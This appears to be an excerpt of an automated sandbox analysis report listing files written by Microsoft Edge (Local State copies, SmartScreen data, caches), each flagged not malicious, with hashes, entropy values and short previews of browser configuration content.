SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMQwuF9hDO6vP6O+8tbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEO6Ntbz8hu3VlXr4CRo1
MD5:	FF06141689970FFC988042BABECD1FCE
SHA1:	34B311470B4D15C7964568552039E05761352069
SHA-256:	AC67C402643ACBAF82EC745D9AC82C0D19BC5E78E49230CF6FE02F57A248CD6A
SHA-512:	9B958C8C7B14044F77DF6A50E6A0E50E5355AB4B1964ED277D29D82694BC74B210A960F703A3010335B2E9692B8C2CF567184560DAC34DB4DAECFF6633FCC3DE
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF4e3e4.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090760753546619
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMQwuF9hDO6vP6O+8tbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEO6Ntbz8hu3VlXr4CRo1
MD5:	FF06141689970FFC988042BABECD1FCE
SHA1:	34B311470B4D15C7964568552039E05761352069
SHA-256:	AC67C402643ACBAF82EC745D9AC82C0D19BC5E78E49230CF6FE02F57A248CD6A
SHA-512:	9B958C8C7B14044F77DF6A50E6A0E50E5355AB4B1964ED277D29D82694BC74B210A960F703A3010335B2E9692B8C2CF567184560DAC34DB4DAECFF6633FCC3DE
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF4e6b3.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090760753546619
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMQwuF9hDO6vP6O+8tbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEO6Ntbz8hu3VlXr4CRo1
MD5:	FF06141689970FFC988042BABECD1FCE
SHA1:	34B311470B4D15C7964568552039E05761352069
SHA-256:	AC67C402643ACBAF82EC745D9AC82C0D19BC5E78E49230CF6FE02F57A248CD6A
SHA-512:	9B958C8C7B14044F77DF6A50E6A0E50E5355AB4B1964ED277D29D82694BC74B210A960F703A3010335B2E9692B8C2CF567184560DAC34DB4DAECFF6633FCC3DE
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF50cc9.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090760753546619
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMQwuF9hDO6vP6O+8tbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEO6Ntbz8hu3VlXr4CRo1
MD5:	FF06141689970FFC988042BABECD1FCE
SHA1:	34B311470B4D15C7964568552039E05761352069
SHA-256:	AC67C402643ACBAF82EC745D9AC82C0D19BC5E78E49230CF6FE02F57A248CD6A
SHA-512:	9B958C8C7B14044F77DF6A50E6A0E50E5355AB4B1964ED277D29D82694BC74B210A960F703A3010335B2E9692B8C2CF567184560DAC34DB4DAECFF6633FCC3DE
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF53456.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090760753546619
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMQwuF9hDO6vP6O+8tbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEO6Ntbz8hu3VlXr4CRo1
MD5:	FF06141689970FFC988042BABECD1FCE
SHA1:	34B311470B4D15C7964568552039E05761352069
SHA-256:	AC67C402643ACBAF82EC745D9AC82C0D19BC5E78E49230CF6FE02F57A248CD6A
SHA-512:	9B958C8C7B14044F77DF6A50E6A0E50E5355AB4B1964ED277D29D82694BC74B210A960F703A3010335B2E9692B8C2CF567184560DAC34DB4DAECFF6633FCC3DE
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	47
Entropy (8bit):	4.3818353308528755
Encrypted:	false
SSDEEP:	3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
MD5:	48324111147DECC23AC222A361873FC5
SHA1:	0DF8B2267ABBDBD11C422D23338262E3131A4223
SHA-256:	D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
SHA-512:	E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
Malicious:	false
Preview:	customSettings_F95BA787499AB4FA9EFFF472CE383A14

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings_F95BA787499AB4FA9EFFF472CE383A14

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	35
Entropy (8bit):	4.014438730983427
Encrypted:	false
SSDEEP:	3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
MD5:	BB57A76019EADEDC27F04EB2FB1F1841
SHA1:	8B41A1B995D45B7A74A365B6B1F1F21F72F86760
SHA-256:	2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
SHA-512:	A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
Malicious:	false
Preview:	{"forceServiceDetermination":false}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	81
Entropy (8bit):	4.3439888556902035
Encrypted:	false
SSDEEP:	3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
MD5:	177F4D75F4FEE84EF08C507C3476C0D2
SHA1:	08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
SHA-256:	21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
SHA-512:	94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
Malicious:	false
Preview:	edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	130439
Entropy (8bit):	3.80180718117079
Encrypted:	false
SSDEEP:	1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
MD5:	EB75CEFFE37E6DF9C171EE8380439EDA
SHA1:	F00119BA869133D64E4F7F0181161BD47968FA23
SHA-256:	48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
SHA-512:	044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
Malicious:	false
Preview:	{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.346439344671015
Encrypted:	false
SSDEEP:	3:kfKbUPVXXMVQX:kygV5
MD5:	6A3A60A3F78299444AACAA89710A64B6
SHA1:	2A052BF5CF54F980475085EEF459D94C3CE5EF55
SHA-256:	61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
SHA-512:	C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
Malicious:	false
Preview:	synchronousLookupUris_638343870221005468

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris_638343870221005468

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	57
Entropy (8bit):	4.556488479039065
Encrypted:	false
SSDEEP:	3:GSCIPPlzYxi21goD:bCWBYx99D
MD5:	3A05EAEA94307F8C57BAC69C3DF64E59
SHA1:	9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
SHA-256:	A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
SHA-512:	6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
Malicious:	false
Preview:	9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	29
Entropy (8bit):	4.030394788231021
Encrypted:	false
SSDEEP:	3:0xXeZUSXkcVn:0Re5kcV
MD5:	52E2839549E67CE774547C9F07740500
SHA1:	B172E16D7756483DF0CA0A8D4F7640DD5D557201
SHA-256:	F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
SHA-512:	D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
Malicious:	false
Preview:	topTraffic_638004170464094982

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_170540185939602997400506234197983529371

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	575056
Entropy (8bit):	7.999649474060713
Encrypted:	true
SSDEEP:	12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
MD5:	BE5D1A12C1644421F877787F8E76642D
SHA1:	06C46A95B4BD5E145E015FA7E358A2D1AC52C809
SHA-256:	C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
SHA-512:	FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
Malicious:	false
Preview:	...._+jE.`..}....S..1....G}s..E....y".Wh.^.W.H...-...#.A...KR...9b........>k......bU.IVo...D......Y..[l.yx.......'c=..I0.....E.d...-...1 ....m../C...OQ.........qW..<:N.....38.u..X-..s....<..U.,Mi..._.......`.Y/.........^..,.E..........j@..G8..N.... ..Ea...4.+.79k.!T.-5W..!..@+..!.P..LDG.....V."....L.... .(#..$..&......C.....%A.T}....K_.S..'Q.".d....s....(j.D!......Ov..)d0)."(..%..-..G..L.}....i.....m9;.....t.w..0....f?..-..M.c.3.....N7K.T..D>.3.x...z..u$5!..4..T.....U.O^L{.5..=E..'..;.}(\|.6.:..f!.>...?M.8......P.D.J.I4.<....y.E....>....i%.6..Y.@..n.....M..r..C.f.;..<..0.H...F....h.......HB1]1....u..:...H..k....B.Q..J...@}j~.#...'Y.J~....I...ub.&..L[z..1.W/.Ck....M.......[.......N.F..z.{nZ~d.V.4.u.K.V.......X.<p..cz..>....X...W..da3(..g..Z$.L4.j=~.p.l.\.[e.&&.Y ...U)..._.^r0.,.{_......`S..[....(.\..p.bt.g..%.$+....f.....d....Im..f...W ......G..i_8a..ae..7....pS.....z-H..A.s.4.3..O.r.....u.S......a.}..v.-/..... ...a.x#./:...sS&U.().xL...pg

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_638004170464094982

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	raw G3 (Group 3) FAX, byte-padded
Category:	dropped
Size (bytes):	460992
Entropy (8bit):	7.999625908035124
Encrypted:	true
SSDEEP:	12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
MD5:	E9C502DB957CDB977E7F5745B34C32E6
SHA1:	DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
SHA-256:	5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
SHA-512:	B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
Malicious:	false
Preview:	...2lI.5.<C.;.{....._+jE.`..}....-...#.A...KR...l.M0,s...).9..........x.......F.b......jU....y.h'....L<.....Z..%...._...g.4yu...........'c=..I0..........qW..<:N....<..U.,Mi..._......'(..U.9.!........u....7...4. ..Ea...4.+.79k.!T.-5W..!..@+..$..t\|1.E..7F...+..xf....z&_Q...-.B...)8R.c....0.......B.M.Z...0....&v..<..H...3.....N7K.T..D>.8......P.D.J.I4.B.H.VHy...@.Wc.Cl..6aD..j.....E..4..mI..X]2.GH.G.L...E.F.=.J...@}j~.#...'Y.L[z..1.W/.Ck....L..X........J.NYd........>...N.F..z.{nZ~d.N..../..6.\L...Q...+.w..p...>.S.iG...0]..8....S..)`B#.v..^..T.?...Z.rz.D'.!.T.w....S..8....V.4.u.K.V.......W.6s...Y.).[.c.X.S..........5.X7F...tQ....z.L.X..(3#j...8...i.[..j$.Q....0...]"W.c.H..n..2Te.ak...c..-F(..W2.b....3.]......c.d\|.../....._...f.....d....Im..g.b..R.q.<xx...i2..r.I()Iat..b.j.r@K.+5..C.....nJ.>P,.V@.....s.4.3..O.r.....smd7...L.....].u&1../t.*.......uXb...=@.....wv......]....#.{$.w......i.....\|.....?....E7...}$+..t).E.U..Q..~.`.)..Y@.6.h.......%(

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	9
Entropy (8bit):	3.169925001442312
Encrypted:	false
SSDEEP:	3:CMzOn:CM6
MD5:	B6F7A6B03164D4BF8E3531A5CF721D30
SHA1:	A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
SHA-256:	3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
SHA-512:	4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
Malicious:	false
Preview:	uriCache_

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache_

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	179
Entropy (8bit):	5.0315676499554405
Encrypted:	false
SSDEEP:	3:YTyLSmafBoTfIeRDHtDozRLuLgfGBkGAeekVy8HfzXNPIAclV7dKdY:YWLSGTt1o9LuLgfGBPAzkVj/T8ledY
MD5:	876AFF8C902A22733AAA48D115D8E7F4
SHA1:	C7F4F3EACF0D7AF72C4F8B71E71ED8D9F4FCBEF4
SHA-256:	3F363AB18BFA3C5915D266EDB76DAAF7C98294EBF54F91AC937A038D7C79D407
SHA-512:	D45849E745020FD2BF1AB07B2472E5965C56B56D02F2DCF28B049FED43E3AD650433DAA0D1FEA54514CB291C5D5DB6A68289CDBE923C4234E571C35EC0C48CDE
Malicious:	false
Preview:	{"version":1,"cache_data":[{"file_hash":"da2d278eafa98c1f","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1730838781649863}]}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Variations

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	86
Entropy (8bit):	4.3751917412896075
Encrypted:	false
SSDEEP:	3:YQ3JYq9xSs0dMEJAELJ2rjozQw:YQ3Kq9X0dMgAEwj2
MD5:	16B7586B9EBA5296EA04B791FC3D675E
SHA1:	8890767DD7EB4D1BEAB829324BA8B9599051F0B0
SHA-256:	474D668707F1CB929FEF1E3798B71B632E50675BD1A9DCEAAB90C9587F72F680
SHA-512:	58668D0C28B63548A1F13D2C2DFA19BCC14C0B7406833AD8E72DFC07F46D8DF6DED46265D74A042D07FBC88F78A59CB32389EF384EC78A55976DFC2737868771
Malicious:	false
Preview:	{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":2}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\e882fbb9-8504-4a8a-9ac3-dff18ef07801.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	45596
Entropy (8bit):	6.091862588422716
Encrypted:	false
SSDEEP:	768:LDXzgWPsj/qlGJqIY8GB4x9MM9uqhDO6vP6OxXFF3+jquHzFGvMncGoup1Xl3jVL:L/Ps+wsI7yO9MP6vF0chu3VlXr4CRo4
MD5:	57185BC9878B86CFE40D71915376B842
SHA1:	43FF7B3062ED8BCEA54A39E2CD6EAECD8AA757B7
SHA-256:	8033E8A7171143FEE60A2FFF307CBBD198BAEDA38CF953AE0ED163D587F0A5B2
SHA-512:	316BFF24EC820424D7C497B84FE241F287C258EB4C71B944409BEF9B34206DB55E9B9E37AADFD07150E5732F50F4BA1EA3484BE62732CFF470BFD562D031D427
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UW

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	2278
Entropy (8bit):	3.8558228099201273
Encrypted:	false
